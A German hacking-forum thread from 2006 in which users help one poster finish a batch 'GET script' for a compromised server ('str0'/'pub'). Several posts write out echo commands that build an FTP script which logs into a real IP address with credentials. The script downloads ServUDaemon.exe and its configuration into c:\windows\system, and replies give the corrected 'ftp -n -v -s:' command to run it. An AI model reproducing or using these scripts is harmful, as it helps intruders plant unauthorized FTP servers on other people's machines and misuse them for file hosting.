GET script problem

Dieses Thema im Forum "Sicherheit & Datenschutz" wurde erstellt von h 4 x x 0 r, 31. Dezember 2006 .

Schlagworte:
Status des Themas:
Es sind keine weiteren Antworten möglich.
  1. Diese Seite verwendet Cookies. Wenn du dich weiterhin auf dieser Seite aufhältst, akzeptierst du unseren Einsatz von Cookies. Weitere Informationen
  1. #1 31. Dezember 2006
    morgäähn RR,

    hab ein problem, und zwar hab ich das GET script erstellt für meinen str0. nun brauch ich die filez, und dort häng ich..

    FTP.exe -s:FTP.txt, muss ich eingeben. wenn ich das eingegeben hab, kommt ne meldung

    " -g Disables filename globbing (see GLOB command).

    -s:filename Specifies a text file containing FTP commands; the

    commands will automatically run after FTP starts.

    -a Use any local interface when binding data connection.

    -A login as anonymous.

    -x:send sockbuf Overrides the default SO_SNDBUF size of 8192.

    -r:recv sockbuf Overrides the default SO_RCVBUF size of 8192.

    -b:async count Overrides the default async count of 3

    -w:buffer size Overrides the default transfer buffer size of 65535.

    host Specifies the host name or IP address of the remote

    host to connect to.



    Notes:

    - mget and mput commands take y/n/q for yes/no/quit.

    - Use Control-C to abort commands. "

    sollte ich anstatt "s", die pubip eingeben?
     

  2. Anzeige
  3. #2 31. Dezember 2006
    AW: GET script problem

    musst glaub ich deb absoluten pfad (also -s:c:\ftp.txt z.B.) angeben!
     
  4. #3 31. Dezember 2006
    AW: GET script problem

    " The filename, directory name, or volume label syntax is incorrect. "

    kommt als meldung. die e: festplatte hatte 600 gb, von dem str0.^^
     
  5. #4 31. Dezember 2006
    AW: GET script problem

    dan machs doch per tftp geht eh besser (meiner meinung nach)
     
  6. #5 31. Dezember 2006
    AW: GET script problem

    was willst du überhaupt tun? via shell dateien von nem pub auf nen server laden lassen?

    wie sieht dein script aus?

    den pfad musst du nur angeben, wenn sich das script-file nicht in %systemroot%\system32 befindet..

    hast du schonmal versucht, ftp.exe anders auszuführen? zB ftp -n -v -s:<script>

    was meinst du mit "sollte ich anstatt "s", die pubip eingeben?"?
     
  7. #6 31. Dezember 2006
    AW: GET script problem

    Echo Open 66.34.60.35>>FTP.txt
    Echo Admin>>FTP.txt
    Echo test>>FTP.txt
    Echo Lcd c:\windows\system>>FTP.txt
    Echo GET ServUDaemon.exe>>FTP.txt
    Echo GET ServUDaemon.ini>>FTP.txt
    Echo Quit>>FTP

    get script sieht so aus..
     
  8. #7 31. Dezember 2006
    AW: GET script problem

    also erstens hast du meine anderen fragen noch nicht beantwortet, aber ich geb mal ne hilfestellung:

    "quit" wird nicht in dein script geschrieben.

    via port 21 (standart, wenn nichts angegeben ist) kommt man nicht auf den pub drauf mit den angegebenen daten.

    zeile 2 und 3 umschreiben zu einer zeile: "echo user Admin test>>FTP.txt", script dann via "ftp -n -v -s:FTP.txt" ausführen und berichten, obs jetzt geht.

    wenn du nen anonymous pub nimmst, kannste user/pass auch ganz weglassen und dafür den befehl "ftp -n -v -a -s:FTP.txt" benutzen. (parameter -a für anonymous)

    //edit: an molli unten: binary muss nicht zwingend mit rein... ja und lcd auch nicht.
     
  9. #8 31. Dezember 2006
    AW: GET script problem

    also ich hoffe mal du hast nicht gerade deinen pup preisgegeben zu dem wenn du nen pup mit username und so hast dann musst du auch port angeben das schon mal dazu dann
    Echo Open 66.34.60.35>>c:\FTP.txt
    Echo Admin>>c:\FTP.txt
    (wenn kein user also anonymous dann so echo user anonymous anonymous@lol.com>>c:\FTP.txt )

    Echo test>>c:\FTP.txt
    Echo BINARY>>c:\FTP.txt(das muss auch mit rein ;))
    Echo Lcd c:\windows\system>>c:\FTP.txt(würde ich weg lassen und selber moven)
    Echo GET ServUDaemon.exe>>c:\FTP.txt
    Echo GET ServUDaemon.ini>>c:\FTP.txt
    Echo Quit>>c:\FTP.txt


    ftp -n -v -s:c:\FTP.txt

    fertig ;)
     
  10. #9 31. Dezember 2006
    AW: GET script problem

    Open 66.34.60.35
    Open 66.34.60.35
    Open 66.34.60.35
    Open 66.34.60.35
    Open 66.34.60.35
    Open 66.34.60.35
    Open 66.34.60.35
    > ftp: connect :Connection refused
    > ftp: connect :Connection refused
    > ftp: connect :Connection refused
    > ftp: connect :Connection refused
    > ftp: connect :Connection refused
    > ftp: connect :Connection refused
    > ftp: connect :Connection refused

    wtf..? evtl. anderen pub nehmen?
     
  11. #10 31. Dezember 2006
    AW: GET script problem

    FW abgeschalted?
     
  12. #11 31. Dezember 2006
    AW: GET script problem

    hab firewall ausgeschaltet, aber kommt immernoch die gleiche meldung.. :-/

    \\edit : fehler gefunden. hinter dem scan, sitzt ein router. :/

    kann also geschlossen werden. bewertung geht an alle raus..
     

  13. Videos zum Thema
Die Seite wird geladen...
Similar Threads - script problem
  1. Antworten:
    3
    Aufrufe:
    1.329
  2. Antworten:
    4
    Aufrufe:
    1.265
  3. Antworten:
    3
    Aufrufe:
    1.636
  4. Antworten:
    4
    Aufrufe:
    540
  5. [JavaScript] Problem mit Code

    juppwatis , 28. September 2011 , im Forum: Webentwicklung
    Antworten:
    5
    Aufrufe:
    562